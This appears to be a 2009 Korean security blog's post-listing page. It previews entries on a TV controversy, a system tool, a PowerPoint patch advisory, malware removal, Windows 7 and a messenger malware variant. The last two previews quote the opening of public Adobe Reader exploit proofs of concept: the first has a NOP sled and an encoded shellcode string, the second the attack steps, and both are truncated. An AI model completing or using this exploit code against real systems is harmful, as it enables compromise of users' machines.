본문 바로가기
"텐프로"가 어때서? -아시아경제 공중파 TV에 텐프로 룸살롱에 종사하는 23세 아가씨가 출연할 예정이라 논란을 예고하고 있다. 자세한 내용은 원문으로 확인하는것이 좋다;; 무단배포때문에 ㅋㅋ 원문기사 : http://www.asiae.co.kr/uhtml/read.php?idxno=2009051310161401325 그림출처(아시아 경제 기사내용 中 ) "텐프로" 란? 대한민국 상위 10%만 찾는다는 최고급 룸살롱에 종사하는 종업원이다. 개인적인 생각으로는 그것도 하나의 직업인데 왜 공중파에 나온다고 뭐라고 하는지 모르겠다. 물론 시간대만 10시 이후면 괜찮다는 생각이지만~^^ 술집에서 종사한다고 해서 공중파에 나오지 말라는 법규라도 있는 것인가? 법에 대해서는 전~혀 모르기때문에 이렇게 쓰는것도 문제가 있을 지는 모르지만, 케이블에서.. 2009. 5. 13.
[시스템툴]Wsyscheck 1.68.33.0 SK Infosec에서 쓸만한 시스템툴을 설명 해주었다. 직접 사용해 보니, loading에 조금 기다림이 있지만, 대체적으로 Icesword와 Gmer를 섞어 놓은 느낌이 많이 들었다. 영문 버전, 중국어 버전이 있으며 쉽게 영문버전으로 설치하는것이 좋을듯 ㅋㅋ 자세한 설명은 인포섹에서 발표한 PDF파일로 확인!! Wsyscheck 분석메뉴얼 : http://mss.skinfosec.co.kr/docs/?p=160 설치 URL : http://wangsea.ys168.com (일부 브라우저에서는 연결이 실패할 수 있습니다. 구글 크롬은 연결이 안되네요^^;) 2009. 5. 13.
Microsoft 보안업데이트(2009년5월13일) S Office PowerPoint에서 해킹에 악용 가능한 취약점에 대한 5월 MS 정기보안업데이트가 발표되었으니, 조속히 패치하시기 바랍니다. [MS09-017] MS Office PowerPoint 취약점으로 인한 원격코드실행 문제 □ 영향 o 공격자가 영향 받는 시스템에 대해 완전한 권한 획득 □ 설명 o MS Office PowerPoint에서 조작된 개체가 포함된 PowerPoint 파일을 처리할 때 발생하는 문제점으로 인한 원격코드 실행 취약점 발생 o 공격자는 조작된 PowerPoint 파일을 사용자에게 전송하여 이를 열어보도록 유도함. 공격이 성공하면 공격자는 프로그램 설치, 삭제, 계정 생성 등 영향 받는 시스템에 대해 완전한 권한 획득 가능 o 관련취약점 : - Legacy File F.. 2009. 5. 13.
하우리보안칼럼 “악성코드, 내 손으로 제거해보자” (주)하우리 기술연구소 바이러스팀 연구원 이새별님 께서 작성 하셨다. 원본링크 : http://hauri.co.kr/customer/security/colum_view.html?intSeq=89&page=1 읽어보니 악성코드 수동삭제에 대해서 잘 설명해 주셨지만, 초보자들이 하기에는 조금 무리인듯 하다;; 2009. 5. 12.
Microsoft: Windows 7 release in August '09 마이크로 소프트가 윈도우7버전을 8월달에 발표한다고 한다. Microsoft has officially dropped the façade on Windows 7 in 2010 and conceded that its essentially completed operating system will ship this year. Windows 7 will be released to manufacturing in about three months, pending feedback on the current release candidate, senior vice president of the Windows and Windows Live engineering group Steven Sinofsky said Monday... 2009. 5. 12.
네이트온 변종 발생 최근 네이트온 쪽지로 전파되는 악성코드의 변종이 발생하고 있다. 파일이 실행되면, 4명의 여자의 사진을 보여주며 악성파일을 설치한다. 2009. 5. 11.
[AdobeReader]Adobe Reader 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit GetAnnots() 취약점과 같이 발표 된 customDictionaryOpen()의 POC //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux //############## var memory; function New_Script() { var nop = unescape("%u9090%u9090"); var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b %u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%.. 2009. 4. 30.
[AdobeReader]Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit 몇일 전 취약점이 공개되었던 AdobeReader에 대한 POC가 공개되었다. 이제 또 한차례 폭풍이 불어오나? ㅋ //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux // //Steps: //- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted) //- attach the following script to the OpenAction of the pdf. //############## var memory; function New_Scri.. 2009. 4. 30.